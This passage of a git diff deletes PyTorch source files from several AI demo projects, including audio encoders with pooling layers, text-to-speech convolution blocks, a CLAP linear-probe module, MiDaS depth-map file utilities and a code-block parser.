https://arxiv.org/abs/1810.09050 - """ - def __init__(self, pooldim=1): - super().__init__() - self.pooldim = pooldim - - def forward(self, logits, time_decision): - return (time_decision**2).sum(self.pooldim) / time_decision.sum( - self.pooldim) - - -class MeanPool(nn.Module): - - def __init__(self, pooldim=1): - super().__init__() - self.pooldim = pooldim - - def forward(self, logits, decision): - return torch.mean(decision, dim=self.pooldim) - - -class AttentionPool(nn.Module): - """docstring for AttentionPool""" - def __init__(self, inputdim, outputdim=10, pooldim=1, **kwargs): - super().__init__() - self.inputdim = inputdim - self.outputdim = outputdim - self.pooldim = pooldim - self.transform = nn.Linear(inputdim, outputdim) - self.activ = nn.Softmax(dim=self.pooldim) - self.eps = 1e-7 - - def forward(self, logits, decision): - # Input is (B, T, D) - # B, T, D - w = self.activ(torch.clamp(self.transform(logits), -15, 15)) - detect = (decision * w).sum( - self.pooldim) / (w.sum(self.pooldim) + self.eps) - # B, T, D - return detect - - -class MMPool(nn.Module): - - def __init__(self, dims): - super().__init__() - self.avgpool = nn.AvgPool2d(dims) - self.maxpool = nn.MaxPool2d(dims) - - def forward(self, x): - return self.avgpool(x) + self.maxpool(x) - - -def parse_poolingfunction(poolingfunction_name='mean', **kwargs): - """parse_poolingfunction - A heler function to parse any temporal pooling - Pooling is done on dimension 1 - :param poolingfunction_name: - :param **kwargs: - """ - poolingfunction_name = poolingfunction_name.lower() - if poolingfunction_name == 'mean': - return MeanPool(pooldim=1) - elif poolingfunction_name == 'linear': - return LinearSoftPool(pooldim=1) - elif poolingfunction_name == 'attention': - return AttentionPool(inputdim=kwargs['inputdim'], - outputdim=kwargs['outputdim']) - - -def embedding_pooling(x, lens, pooling="mean"): - if pooling == "max": - fc_embs = max_with_lens(x, lens) - elif pooling == "mean": - fc_embs = mean_with_lens(x, lens) - elif pooling == "mean+max": - x_mean = mean_with_lens(x, lens) - x_max = max_with_lens(x, lens) - fc_embs = x_mean + x_max - elif pooling == "last": - indices = (lens - 1).reshape(-1, 1, 1).repeat(1, 1, x.size(-1)) - # 
indices: [N, 1, hidden] - fc_embs = torch.gather(x, 1, indices).squeeze(1) - else: - raise Exception(f"pooling method {pooling} not support") - return fc_embs - - -class Cdur5Encoder(BaseEncoder): - - def __init__(self, spec_dim, fc_feat_dim, attn_feat_dim, pooling="mean"): - super().__init__(spec_dim, fc_feat_dim, attn_feat_dim) - self.pooling = pooling - self.features = nn.Sequential( - Block2D(1, 32), - nn.LPPool2d(4, (2, 4)), - Block2D(32, 128), - Block2D(128, 128), - nn.LPPool2d(4, (2, 4)), - Block2D(128, 128), - Block2D(128, 128), - nn.LPPool2d(4, (1, 4)), - nn.Dropout(0.3), - ) - with torch.no_grad(): - rnn_input_dim = self.features( - torch.randn(1, 1, 500, spec_dim)).shape - rnn_input_dim = rnn_input_dim[1] * rnn_input_dim[-1] - - self.gru = nn.GRU(rnn_input_dim, - 128, - bidirectional=True, - batch_first=True) - self.apply(init) - - def forward(self, input_dict): - x = input_dict["spec"] - lens = input_dict["spec_len"] - if "upsample" not in input_dict: - input_dict["upsample"] = False - lens = torch.as_tensor(copy.deepcopy(lens)) - N, T, _ = x.shape - x = x.unsqueeze(1) - x = self.features(x) - x = x.transpose(1, 2).contiguous().flatten(-2) - x, _ = self.gru(x) - if input_dict["upsample"]: - x = nn.functional.interpolate( - x.transpose(1, 2), - T, - mode='linear', - align_corners=False).transpose(1, 2) - else: - lens //= 4 - attn_emb = x - fc_emb = embedding_pooling(x, lens, self.pooling) - return { - "attn_emb": attn_emb, - "fc_emb": fc_emb, - "attn_emb_len": lens - } - - -def conv_conv_block(in_channel, out_channel): - return nn.Sequential( - nn.Conv2d(in_channel, - out_channel, - kernel_size=3, - bias=False, - padding=1), - nn.BatchNorm2d(out_channel), - nn.ReLU(True), - nn.Conv2d(out_channel, - out_channel, - kernel_size=3, - bias=False, - padding=1), - nn.BatchNorm2d(out_channel), - nn.ReLU(True) - ) - - -class Cdur8Encoder(BaseEncoder): - - def __init__(self, spec_dim, fc_feat_dim, attn_feat_dim, pooling="mean"): - super().__init__(spec_dim, fc_feat_dim, attn_feat_dim) - self.pooling = pooling - self.features = nn.Sequential( - conv_conv_block(1, 64), - MMPool((2, 2)), - nn.Dropout(0.2, True), - conv_conv_block(64, 128), - MMPool((2, 2)), - nn.Dropout(0.2, True), - conv_conv_block(128, 256), - MMPool((1, 2)), - nn.Dropout(0.2, True), - conv_conv_block(256, 512), - MMPool((1, 2)), - nn.Dropout(0.2, True), - nn.AdaptiveAvgPool2d((None, 1)), - ) - self.init_bn = nn.BatchNorm2d(spec_dim) - self.embedding = nn.Linear(512, 512) - self.gru = nn.GRU(512, 256, bidirectional=True, batch_first=True) - self.apply(init) - - def forward(self, input_dict): - x = input_dict["spec"] - lens = input_dict["spec_len"] - lens = torch.as_tensor(copy.deepcopy(lens)) - x = x.unsqueeze(1) # B x 1 x T x D - x = x.transpose(1, 3) - x = self.init_bn(x) - x = x.transpose(1, 3) - x = self.features(x) - x = x.transpose(1, 2).contiguous().flatten(-2) - x = F.dropout(x, p=0.5, training=self.training) - x = F.relu_(self.embedding(x)) - x, _ = self.gru(x) - attn_emb = x - lens //= 4 - fc_emb = embedding_pooling(x, lens, self.pooling) - return { - "attn_emb": attn_emb, - "fc_emb": fc_emb, - "attn_emb_len": lens - } - - -class Cnn10Encoder(BaseEncoder): - - def __init__(self, spec_dim, fc_feat_dim, attn_feat_dim): - super().__init__(spec_dim, fc_feat_dim, attn_feat_dim) - self.features = nn.Sequential( - conv_conv_block(1, 64), - nn.AvgPool2d((2, 2)), - nn.Dropout(0.2, True), - conv_conv_block(64, 128), - nn.AvgPool2d((2, 2)), - nn.Dropout(0.2, True), - conv_conv_block(128, 256), - nn.AvgPool2d((2, 2)), - 
nn.Dropout(0.2, True), - conv_conv_block(256, 512), - nn.AvgPool2d((2, 2)), - nn.Dropout(0.2, True), - nn.AdaptiveAvgPool2d((None, 1)), - ) - self.init_bn = nn.BatchNorm2d(spec_dim) - self.embedding = nn.Linear(512, 512) - self.apply(init) - - def forward(self, input_dict): - x = input_dict["spec"] - lens = input_dict["spec_len"] - lens = torch.as_tensor(copy.deepcopy(lens)) - x = x.unsqueeze(1) # [N, 1, T, D] - x = x.transpose(1, 3) - x = self.init_bn(x) - x = x.transpose(1, 3) - x = self.features(x) # [N, 512, T/16, 1] - x = x.transpose(1, 2).contiguous().flatten(-2) # [N, T/16, 512] - attn_emb = x - lens //= 16 - fc_emb = embedding_pooling(x, lens, "mean+max") - fc_emb = F.dropout(fc_emb, p=0.5, training=self.training) - fc_emb = self.embedding(fc_emb) - fc_emb = F.relu_(fc_emb) - return { - "attn_emb": attn_emb, - "fc_emb": fc_emb, - "attn_emb_len": lens - } - - -class ConvBlock(nn.Module): - def __init__(self, in_channels, out_channels): - - super(ConvBlock, self).__init__() - - self.conv1 = nn.Conv2d(in_channels=in_channels, - out_channels=out_channels, - kernel_size=(3, 3), stride=(1, 1), - padding=(1, 1), bias=False) - - self.conv2 = nn.Conv2d(in_channels=out_channels, - out_channels=out_channels, - kernel_size=(3, 3), stride=(1, 1), - padding=(1, 1), bias=False) - - self.bn1 = nn.BatchNorm2d(out_channels) - self.bn2 = nn.BatchNorm2d(out_channels) - - self.init_weight() - - def init_weight(self): - init_layer(self.conv1) - init_layer(self.conv2) - init_bn(self.bn1) - init_bn(self.bn2) - - - def forward(self, input, pool_size=(2, 2), pool_type='avg'): - - x = input - x = F.relu_(self.bn1(self.conv1(x))) - x = F.relu_(self.bn2(self.conv2(x))) - if pool_type == 'max': - x = F.max_pool2d(x, kernel_size=pool_size) - elif pool_type == 'avg': - x = F.avg_pool2d(x, kernel_size=pool_size) - elif pool_type == 'avg+max': - x1 = F.avg_pool2d(x, kernel_size=pool_size) - x2 = F.max_pool2d(x, kernel_size=pool_size) - x = x1 + x2 - else: - raise Exception('Incorrect argument!') - - return x - - -class Cnn14Encoder(nn.Module): - def __init__(self, sample_rate=32000): - super().__init__() - sr_to_fmax = { - 32000: 14000, - 16000: 8000 - } - # Logmel spectrogram extractor - self.melspec_extractor = transforms.MelSpectrogram( - sample_rate=sample_rate, - n_fft=32 * sample_rate // 1000, - win_length=32 * sample_rate // 1000, - hop_length=10 * sample_rate // 1000, - f_min=50, - f_max=sr_to_fmax[sample_rate], - n_mels=64, - norm="slaney", - mel_scale="slaney" - ) - self.hop_length = 10 * sample_rate // 1000 - self.db_transform = transforms.AmplitudeToDB() - # Spec augmenter - self.spec_augmenter = SpecAugmentation(time_drop_width=64, - time_stripes_num=2, freq_drop_width=8, freq_stripes_num=2) - - self.bn0 = nn.BatchNorm2d(64) - - self.conv_block1 = ConvBlock(in_channels=1, out_channels=64) - self.conv_block2 = ConvBlock(in_channels=64, out_channels=128) - self.conv_block3 = ConvBlock(in_channels=128, out_channels=256) - self.conv_block4 = ConvBlock(in_channels=256, out_channels=512) - self.conv_block5 = ConvBlock(in_channels=512, out_channels=1024) - self.conv_block6 = ConvBlock(in_channels=1024, out_channels=2048) - - self.downsample_ratio = 32 - - self.fc1 = nn.Linear(2048, 2048, bias=True) - - self.init_weight() - - def init_weight(self): - init_bn(self.bn0) - init_layer(self.fc1) - - def load_pretrained(self, pretrained): - checkpoint = torch.load(pretrained, map_location="cpu") - - if "model" in checkpoint: - state_keys = checkpoint["model"].keys() - backbone = False - for key in state_keys: - if 
key.startswith("backbone."): - backbone = True - break - - if backbone: # COLA - state_dict = {} - for key, value in checkpoint["model"].items(): - if key.startswith("backbone."): - model_key = key.replace("backbone.", "") - state_dict[model_key] = value - else: # PANNs - state_dict = checkpoint["model"] - elif "state_dict" in checkpoint: # CLAP - state_dict = checkpoint["state_dict"] - state_dict_keys = list(filter( - lambda x: "audio_encoder" in x, state_dict.keys())) - state_dict = { - key.replace('audio_encoder.', ''): state_dict[key] - for key in state_dict_keys - } - else: - raise Exception("Unkown checkpoint format") - - model_dict = self.state_dict() - pretrained_dict = { - k: v for k, v in state_dict.items() if (k in model_dict) and ( - model_dict[k].shape == v.shape) - } - model_dict.update(pretrained_dict) - self.load_state_dict(model_dict, strict=True) - - def forward(self, input_dict): - """ - Input: (batch_size, n_samples)""" - waveform = input_dict["wav"] - wave_length = input_dict["wav_len"] - specaug = input_dict["specaug"] - x = self.melspec_extractor(waveform) - x = self.db_transform(x) # (batch_size, mel_bins, time_steps) - x = x.transpose(1, 2) - x = x.unsqueeze(1) # (batch_size, 1, time_steps, mel_bins) - - # SpecAugment - if self.training and specaug: - x = self.spec_augmenter(x) - - x = x.transpose(1, 3) - x = self.bn0(x) - x = x.transpose(1, 3) - - x = self.conv_block1(x, pool_size=(2, 2), pool_type='avg') - x = F.dropout(x, p=0.2, training=self.training) - x = self.conv_block2(x, pool_size=(2, 2), pool_type='avg') - x = F.dropout(x, p=0.2, training=self.training) - x = self.conv_block3(x, pool_size=(2, 2), pool_type='avg') - x = F.dropout(x, p=0.2, training=self.training) - x = self.conv_block4(x, pool_size=(2, 2), pool_type='avg') - x = F.dropout(x, p=0.2, training=self.training) - x = self.conv_block5(x, pool_size=(2, 2), pool_type='avg') - x = F.dropout(x, p=0.2, training=self.training) - x = self.conv_block6(x, pool_size=(1, 1), pool_type='avg') - x = F.dropout(x, p=0.2, training=self.training) - x = torch.mean(x, dim=3) - attn_emb = x.transpose(1, 2) - - wave_length = torch.as_tensor(wave_length) - feat_length = torch.div(wave_length, self.hop_length, - rounding_mode="floor") + 1 - feat_length = torch.div(feat_length, self.downsample_ratio, - rounding_mode="floor") - x_max = max_with_lens(attn_emb, feat_length) - x_mean = mean_with_lens(attn_emb, feat_length) - x = x_max + x_mean - x = F.dropout(x, p=0.5, training=self.training) - x = F.relu_(self.fc1(x)) - fc_emb = F.dropout(x, p=0.5, training=self.training) - - output_dict = { - 'fc_emb': fc_emb, - 'attn_emb': attn_emb, - 'attn_emb_len': feat_length - } - - return output_dict - - -class RnnEncoder(BaseEncoder): - - def __init__(self, spec_dim, fc_feat_dim, attn_feat_dim, - pooling="mean", **kwargs): - super().__init__(spec_dim, fc_feat_dim, attn_feat_dim) - self.pooling = pooling - self.hidden_size = kwargs.get('hidden_size', 512) - self.bidirectional = kwargs.get('bidirectional', False) - self.num_layers = kwargs.get('num_layers', 1) - self.dropout = kwargs.get('dropout', 0.2) - self.rnn_type = kwargs.get('rnn_type', "GRU") - self.in_bn = kwargs.get('in_bn', False) - self.embed_dim = self.hidden_size * (self.bidirectional + 1) - self.network = getattr(nn, self.rnn_type)( - attn_feat_dim, - self.hidden_size, - num_layers=self.num_layers, - bidirectional=self.bidirectional, - dropout=self.dropout, - batch_first=True) - if self.in_bn: - self.bn = nn.BatchNorm1d(self.embed_dim) - self.apply(init) - - def 
forward(self, input_dict): - x = input_dict["attn"] - lens = input_dict["attn_len"] - lens = torch.as_tensor(lens) - # x: [N, T, E] - if self.in_bn: - x = pack_wrapper(self.bn, x, lens) - out = pack_wrapper(self.network, x, lens) - # out: [N, T, hidden] - attn_emb = out - fc_emb = embedding_pooling(out, lens, self.pooling) - return { - "attn_emb": attn_emb, - "fc_emb": fc_emb, - "attn_emb_len": lens - } - - -class Cnn14RnnEncoder(nn.Module): - def __init__(self, sample_rate=32000, pretrained=None, - freeze_cnn=False, freeze_cnn_bn=False, - pooling="mean", **kwargs): - super().__init__() - self.cnn = Cnn14Encoder(sample_rate) - self.rnn = RnnEncoder(64, 2048, 2048, pooling, **kwargs) - if pretrained is not None: - self.cnn.load_pretrained(pretrained) - if freeze_cnn: - assert pretrained is not None, "cnn is not pretrained but frozen" - for param in self.cnn.parameters(): - param.requires_grad = False - self.freeze_cnn_bn = freeze_cnn_bn - - def train(self, mode): - super().train(mode=mode) - if self.freeze_cnn_bn: - def bn_eval(module): - class_name = module.__class__.__name__ - if class_name.find("BatchNorm") != -1: - module.eval() - self.cnn.apply(bn_eval) - return self - - def forward(self, input_dict): - output_dict = self.cnn(input_dict) - output_dict["attn"] = output_dict["attn_emb"] - output_dict["attn_len"] = output_dict["attn_emb_len"] - del output_dict["attn_emb"], output_dict["attn_emb_len"] - output_dict = self.rnn(output_dict) - return output_dict - - -class TransformerEncoder(BaseEncoder): - - def __init__(self, spec_dim, fc_feat_dim, attn_feat_dim, d_model, **kwargs): - super().__init__(spec_dim, fc_feat_dim, attn_feat_dim) - self.d_model = d_model - dropout = kwargs.get("dropout", 0.2) - self.nhead = kwargs.get("nhead", self.d_model // 64) - self.nlayers = kwargs.get("nlayers", 2) - self.dim_feedforward = kwargs.get("dim_feedforward", self.d_model * 4) - - self.attn_proj = nn.Sequential( - nn.Linear(attn_feat_dim, self.d_model), - nn.ReLU(), - nn.Dropout(dropout), - nn.LayerNorm(self.d_model) - ) - layer = nn.TransformerEncoderLayer(d_model=self.d_model, - nhead=self.nhead, - dim_feedforward=self.dim_feedforward, - dropout=dropout) - self.model = nn.TransformerEncoder(layer, self.nlayers) - self.cls_token = nn.Parameter(torch.zeros(d_model)) - self.init_params() - - def init_params(self): - for p in self.parameters(): - if p.dim() > 1: - nn.init.xavier_uniform_(p) - - def forward(self, input_dict): - attn_feat = input_dict["attn"] - attn_feat_len = input_dict["attn_len"] - attn_feat_len = torch.as_tensor(attn_feat_len) - - attn_feat = self.attn_proj(attn_feat) # [bs, T, d_model] - - cls_emb = self.cls_token.reshape(1, 1, self.d_model).repeat( - attn_feat.size(0), 1, 1) - attn_feat = torch.cat((cls_emb, attn_feat), dim=1) - attn_feat = attn_feat.transpose(0, 1) - - attn_feat_len += 1 - src_key_padding_mask = ~generate_length_mask( - attn_feat_len, attn_feat.size(0)).to(attn_feat.device) - output = self.model(attn_feat, src_key_padding_mask=src_key_padding_mask) - - attn_emb = output.transpose(0, 1) - fc_emb = attn_emb[:, 0] - return { - "attn_emb": attn_emb, - "fc_emb": fc_emb, - "attn_emb_len": attn_feat_len - } - - -class Cnn14TransformerEncoder(nn.Module): - def __init__(self, sample_rate=32000, pretrained=None, - freeze_cnn=False, freeze_cnn_bn=False, - d_model="mean", **kwargs): - super().__init__() - self.cnn = Cnn14Encoder(sample_rate) - self.trm = TransformerEncoder(64, 2048, 2048, d_model, **kwargs) - if pretrained is not None: - self.cnn.load_pretrained(pretrained) 
- if freeze_cnn: - assert pretrained is not None, "cnn is not pretrained but frozen" - for param in self.cnn.parameters(): - param.requires_grad = False - self.freeze_cnn_bn = freeze_cnn_bn - - def train(self, mode): - super().train(mode=mode) - if self.freeze_cnn_bn: - def bn_eval(module): - class_name = module.__class__.__name__ - if class_name.find("BatchNorm") != -1: - module.eval() - self.cnn.apply(bn_eval) - return self - - def forward(self, input_dict): - output_dict = self.cnn(input_dict) - output_dict["attn"] = output_dict["attn_emb"] - output_dict["attn_len"] = output_dict["attn_emb_len"] - del output_dict["attn_emb"], output_dict["attn_emb_len"] - output_dict = self.trm(output_dict) - return output_dict - - - - - diff --git a/spaces/AIGC-Audio/AudioGPT/text_to_speech/modules/commons/conv.py b/spaces/AIGC-Audio/AudioGPT/text_to_speech/modules/commons/conv.py deleted file mode 100644 index 7edf126a080767f760dc7d19a349fb9a44afeb46..0000000000000000000000000000000000000000 --- a/spaces/AIGC-Audio/AudioGPT/text_to_speech/modules/commons/conv.py +++ /dev/null @@ -1,167 +0,0 @@ -import math -import torch -import torch.nn as nn -import torch.nn.functional as F - -from text_to_speech.modules.commons.layers import LayerNorm, Embedding - - -class LambdaLayer(nn.Module): - def __init__(self, lambd): - super(LambdaLayer, self).__init__() - self.lambd = lambd - - def forward(self, x): - return self.lambd(x) - - -def init_weights_func(m): - classname = m.__class__.__name__ - if classname.find("Conv1d") != -1: - torch.nn.init.xavier_uniform_(m.weight) - - -class ResidualBlock(nn.Module): - """Implements conv->PReLU->norm n-times""" - - def __init__(self, channels, kernel_size, dilation, n=2, norm_type='bn', dropout=0.0, - c_multiple=2, ln_eps=1e-12): - super(ResidualBlock, self).__init__() - - if norm_type == 'bn': - norm_builder = lambda: nn.BatchNorm1d(channels) - elif norm_type == 'in': - norm_builder = lambda: nn.InstanceNorm1d(channels, affine=True) - elif norm_type == 'gn': - norm_builder = lambda: nn.GroupNorm(8, channels) - elif norm_type == 'ln': - norm_builder = lambda: LayerNorm(channels, dim=1, eps=ln_eps) - else: - norm_builder = lambda: nn.Identity() - - self.blocks = [ - nn.Sequential( - norm_builder(), - nn.Conv1d(channels, c_multiple * channels, kernel_size, dilation=dilation, - padding=(dilation * (kernel_size - 1)) // 2), - LambdaLayer(lambda x: x * kernel_size ** -0.5), - nn.GELU(), - nn.Conv1d(c_multiple * channels, channels, 1, dilation=dilation), - ) - for i in range(n) - ] - - self.blocks = nn.ModuleList(self.blocks) - self.dropout = dropout - - def forward(self, x): - nonpadding = (x.abs().sum(1) > 0).float()[:, None, :] - for b in self.blocks: - x_ = b(x) - if self.dropout > 0 and self.training: - x_ = F.dropout(x_, self.dropout, training=self.training) - x = x + x_ - x = x * nonpadding - return x - - -class ConvBlocks(nn.Module): - """Decodes the expanded phoneme encoding into spectrograms""" - - def __init__(self, hidden_size, out_dims, dilations, kernel_size, - norm_type='ln', layers_in_block=2, c_multiple=2, - dropout=0.0, ln_eps=1e-5, - init_weights=True, is_BTC=True, num_layers=None, post_net_kernel=3): - super(ConvBlocks, self).__init__() - self.is_BTC = is_BTC - if num_layers is not None: - dilations = [1] * num_layers - self.res_blocks = nn.Sequential( - *[ResidualBlock(hidden_size, kernel_size, d, - n=layers_in_block, norm_type=norm_type, c_multiple=c_multiple, - dropout=dropout, ln_eps=ln_eps) - for d in dilations], - ) - if norm_type == 'bn': - norm = 
nn.BatchNorm1d(hidden_size) - elif norm_type == 'in': - norm = nn.InstanceNorm1d(hidden_size, affine=True) - elif norm_type == 'gn': - norm = nn.GroupNorm(8, hidden_size) - elif norm_type == 'ln': - norm = LayerNorm(hidden_size, dim=1, eps=ln_eps) - self.last_norm = norm - self.post_net1 = nn.Conv1d(hidden_size, out_dims, kernel_size=post_net_kernel, - padding=post_net_kernel // 2) - if init_weights: - self.apply(init_weights_func) - - def forward(self, x, nonpadding=None): - """ - - :param x: [B, T, H] - :return: [B, T, H] - """ - if self.is_BTC: - x = x.transpose(1, 2) - if nonpadding is None: - nonpadding = (x.abs().sum(1) > 0).float()[:, None, :] - elif self.is_BTC: - nonpadding = nonpadding.transpose(1, 2) - x = self.res_blocks(x) * nonpadding - x = self.last_norm(x) * nonpadding - x = self.post_net1(x) * nonpadding - if self.is_BTC: - x = x.transpose(1, 2) - return x - - -class TextConvEncoder(ConvBlocks): - def __init__(self, dict_size, hidden_size, out_dims, dilations, kernel_size, - norm_type='ln', layers_in_block=2, c_multiple=2, - dropout=0.0, ln_eps=1e-5, init_weights=True, num_layers=None, post_net_kernel=3): - super().__init__(hidden_size, out_dims, dilations, kernel_size, - norm_type, layers_in_block, c_multiple, - dropout, ln_eps, init_weights, num_layers=num_layers, - post_net_kernel=post_net_kernel) - self.embed_tokens = Embedding(dict_size, hidden_size, 0) - self.embed_scale = math.sqrt(hidden_size) - - def forward(self, txt_tokens): - """ - - :param txt_tokens: [B, T] - :return: { - 'encoder_out': [B x T x C] - } - """ - x = self.embed_scale * self.embed_tokens(txt_tokens) - return super().forward(x) - - -class ConditionalConvBlocks(ConvBlocks): - def __init__(self, hidden_size, c_cond, c_out, dilations, kernel_size, - norm_type='ln', layers_in_block=2, c_multiple=2, - dropout=0.0, ln_eps=1e-5, init_weights=True, is_BTC=True, num_layers=None): - super().__init__(hidden_size, c_out, dilations, kernel_size, - norm_type, layers_in_block, c_multiple, - dropout, ln_eps, init_weights, is_BTC=False, num_layers=num_layers) - self.g_prenet = nn.Conv1d(c_cond, hidden_size, 3, padding=1) - self.is_BTC_ = is_BTC - if init_weights: - self.g_prenet.apply(init_weights_func) - - def forward(self, x, cond, nonpadding=None): - if self.is_BTC_: - x = x.transpose(1, 2) - cond = cond.transpose(1, 2) - if nonpadding is not None: - nonpadding = nonpadding.transpose(1, 2) - if nonpadding is None: - nonpadding = x.abs().sum(1)[:, None] - x = x + self.g_prenet(cond) - x = x * nonpadding - x = super(ConditionalConvBlocks, self).forward(x) # input needs to be BTC - if self.is_BTC_: - x = x.transpose(1, 2) - return x diff --git a/spaces/AIGC-Audio/Make_An_Audio_inpaint/ldm/modules/encoders/open_clap/linear_probe.py b/spaces/AIGC-Audio/Make_An_Audio_inpaint/ldm/modules/encoders/open_clap/linear_probe.py deleted file mode 100644 index bb2841dd4e28201db8b5bd4a215e1b8b9a60d25a..0000000000000000000000000000000000000000 --- a/spaces/AIGC-Audio/Make_An_Audio_inpaint/ldm/modules/encoders/open_clap/linear_probe.py +++ /dev/null @@ -1,63 +0,0 @@ -import numpy as np -import torch.nn.functional as F -from torch import nn -from .model import MLPLayers - - -class LinearProbe(nn.Module): - def __init__(self, model, mlp, freeze, in_ch, out_ch, act=None): - """ - Args: - model: nn.Module - mlp: bool, if True, then use the MLP layer as the linear probe module - freeze: bool, if Ture, then freeze all the CLAP model's layers when training the linear probe - in_ch: int, the output channel from CLAP model - out_ch: int, 
the output channel from linear probe (class_num) - act: torch.nn.functional, the activation function before the loss function - """ - super().__init__() - in_ch = 512 - self.clap_model = model - self.clap_model.text_branch = None # to save memory - self.freeze = freeze - if mlp: - self.lp_layer = MLPLayers(units=[in_ch, in_ch * 2, out_ch]) - else: - self.lp_layer = nn.Linear(in_ch, out_ch) - - if self.freeze: - for param in self.clap_model.parameters(): - param.requires_grad = False - - if act == 'None': - self.act = None - elif act == 'relu': - self.act = nn.ReLU() - elif act == 'elu': - self.act = nn.ELU() - elif act == 'prelu': - self.act = nn.PReLU(num_parameters=in_ch) - elif act == 'softmax': - self.act = nn.Softmax(dim=-1) - elif act == 'sigmoid': - self.act = nn.Sigmoid() - - def forward(self, x, mix_lambda=None, device=None): - """ - Args: - x: waveform, torch.tensor [batch, t_samples] / batch of mel_spec and longer list - mix_lambda: torch.tensor [batch], the mixup lambda - Returns: - class_prob: torch.tensor [batch, class_num] - - """ - # batchnorm cancel grandient - if self.freeze: - self.clap_model.eval() - - x = self.clap_model.audio_projection( - self.clap_model.audio_branch(x, mixup_lambda=mix_lambda, device=device)["embedding"]) - out = self.lp_layer(x) - if self.act is not None: - out = self.act(out) - return out diff --git a/spaces/AIGText/GlyphControl/ldm/modules/midas/utils.py b/spaces/AIGText/GlyphControl/ldm/modules/midas/utils.py deleted file mode 100644 index 9a9d3b5b66370fa98da9e067ba53ead848ea9a59..0000000000000000000000000000000000000000 --- a/spaces/AIGText/GlyphControl/ldm/modules/midas/utils.py +++ /dev/null @@ -1,189 +0,0 @@ -"""Utils for monoDepth.""" -import sys -import re -import numpy as np -import cv2 -import torch - - -def read_pfm(path): - """Read pfm file. - - Args: - path (str): path to file - - Returns: - tuple: (data, scale) - """ - with open(path, "rb") as file: - - color = None - width = None - height = None - scale = None - endian = None - - header = file.readline().rstrip() - if header.decode("ascii") == "PF": - color = True - elif header.decode("ascii") == "Pf": - color = False - else: - raise Exception("Not a PFM file: " + path) - - dim_match = re.match(r"^(\d+)\s(\d+)\s$", file.readline().decode("ascii")) - if dim_match: - width, height = list(map(int, dim_match.groups())) - else: - raise Exception("Malformed PFM header.") - - scale = float(file.readline().decode("ascii").rstrip()) - if scale < 0: - # little-endian - endian = "<" - scale = -scale - else: - # big-endian - endian = ">" - - data = np.fromfile(file, endian + "f") - shape = (height, width, 3) if color else (height, width) - - data = np.reshape(data, shape) - data = np.flipud(data) - - return data, scale - - -def write_pfm(path, image, scale=1): - """Write pfm file. - - Args: - path (str): pathto file - image (array): data - scale (int, optional): Scale. Defaults to 1. 
- """ - - with open(path, "wb") as file: - color = None - - if image.dtype.name != "float32": - raise Exception("Image dtype must be float32.") - - image = np.flipud(image) - - if len(image.shape) == 3 and image.shape[2] == 3: # color image - color = True - elif ( - len(image.shape) == 2 or len(image.shape) == 3 and image.shape[2] == 1 - ): # greyscale - color = False - else: - raise Exception("Image must have H x W x 3, H x W x 1 or H x W dimensions.") - - file.write("PF\n" if color else "Pf\n".encode()) - file.write("%d %d\n".encode() % (image.shape[1], image.shape[0])) - - endian = image.dtype.byteorder - - if endian == "<" or endian == "=" and sys.byteorder == "little": - scale = -scale - - file.write("%f\n".encode() % scale) - - image.tofile(file) - - -def read_image(path): - """Read image and output RGB image (0-1). - - Args: - path (str): path to file - - Returns: - array: RGB image (0-1) - """ - img = cv2.imread(path) - - if img.ndim == 2: - img = cv2.cvtColor(img, cv2.COLOR_GRAY2BGR) - - img = cv2.cvtColor(img, cv2.COLOR_BGR2RGB) / 255.0 - - return img - - -def resize_image(img): - """Resize image and make it fit for network. - - Args: - img (array): image - - Returns: - tensor: data ready for network - """ - height_orig = img.shape[0] - width_orig = img.shape[1] - - if width_orig > height_orig: - scale = width_orig / 384 - else: - scale = height_orig / 384 - - height = (np.ceil(height_orig / scale / 32) * 32).astype(int) - width = (np.ceil(width_orig / scale / 32) * 32).astype(int) - - img_resized = cv2.resize(img, (width, height), interpolation=cv2.INTER_AREA) - - img_resized = ( - torch.from_numpy(np.transpose(img_resized, (2, 0, 1))).contiguous().float() - ) - img_resized = img_resized.unsqueeze(0) - - return img_resized - - -def resize_depth(depth, width, height): - """Resize depth map and bring to CPU (numpy). - - Args: - depth (tensor): depth - width (int): image width - height (int): image height - - Returns: - array: processed depth - """ - depth = torch.squeeze(depth[0, :, :, :]).to("cpu") - - depth_resized = cv2.resize( - depth.numpy(), (width, height), interpolation=cv2.INTER_CUBIC - ) - - return depth_resized - -def write_depth(path, depth, bits=1): - """Write depth map to pfm and png file. 
- - Args: - path (str): filepath without extension - depth (array): depth - """ - write_pfm(path + ".pfm", depth.astype(np.float32)) - - depth_min = depth.min() - depth_max = depth.max() - - max_val = (2**(8*bits))-1 - - if depth_max - depth_min > np.finfo("float").eps: - out = max_val * (depth - depth_min) / (depth_max - depth_min) - else: - out = np.zeros(depth.shape, dtype=depth.type) - - if bits == 1: - cv2.imwrite(path + ".png", out.astype("uint8")) - elif bits == 2: - cv2.imwrite(path + ".png", out.astype("uint16")) - - return diff --git a/spaces/AIatUIUC/CodeLATS/generators/parse.py b/spaces/AIatUIUC/CodeLATS/generators/parse.py deleted file mode 100644 index c4e925f38f5cb2cf5afdbe804bf9c075b5f4782b..0000000000000000000000000000000000000000 --- a/spaces/AIatUIUC/CodeLATS/generators/parse.py +++ /dev/null @@ -1,49 +0,0 @@ -import re -from typing import Optional - - -def parse_code_block(string: str, lang: str) -> Optional[str]: - code_pattern = fr"```{lang}\n(.*?)\n```" - match = re.search(code_pattern, string, re.DOTALL) - - if match: - return match.group(1) - - generic_code_pattern = r"```\n(.*?)\n```" - match = re.search(generic_code_pattern, string, re.DOTALL) - - if match: - return match.group(1) - - return parse_first_func(string, lang) - - -def parse_first_func(code: str, lang: str) -> Optional[str]: - assert lang == "python", "Only python is supported for now. TODO: Rust" - code_lines = code.split("\n") - def_i = -1 - last_i = 0 - got_return = False - for i, line in enumerate(code_lines): - if line.startswith("def "): - if def_i == -1: - def_i = i - else: - break - elif "return" in line and def_i != -1: - got_return = True - if line == "" and def_i != -1 and got_return: - last_i = i - break - - if last_i == 0: - last_i = len(code_lines) - 1 - - if def_i == -1: - return None - - return "\n".join(code_lines[def_i:last_i+1]).rstrip("[/PYTHON]") - - -def add_code_block(string: str, lang: str) -> str: - return f"```{lang}\n{string}\n```" diff --git a/spaces/Adapter/CoAdapter/ldm/models/diffusion/ddim.py b/spaces/Adapter/CoAdapter/ldm/models/diffusion/ddim.py deleted file mode 100644 index 1b72e4b1226992226dfdad4200a9b9973e658929..0000000000000000000000000000000000000000 --- a/spaces/Adapter/CoAdapter/ldm/models/diffusion/ddim.py +++ /dev/null @@ -1,293 +0,0 @@ -"""SAMPLING ONLY.""" - -import torch -import numpy 